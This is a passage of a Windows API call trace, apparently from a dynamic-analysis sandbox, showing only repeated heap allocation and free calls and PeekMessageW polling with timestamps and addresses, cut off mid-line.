RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.483] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.483] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.483] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.484] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.484] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.484] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.484] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.484] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.485] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.485] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.485] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.485] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.486] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.486] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.486] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764c48 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770f98 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.486] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.487] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.487] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.487] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.487] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.487] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906b0 [0072.487] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.488] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0072.488] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906c0 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.488] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.488] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.489] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906b0 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.489] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.489] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.489] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.490] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0072.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.490] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.490] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, 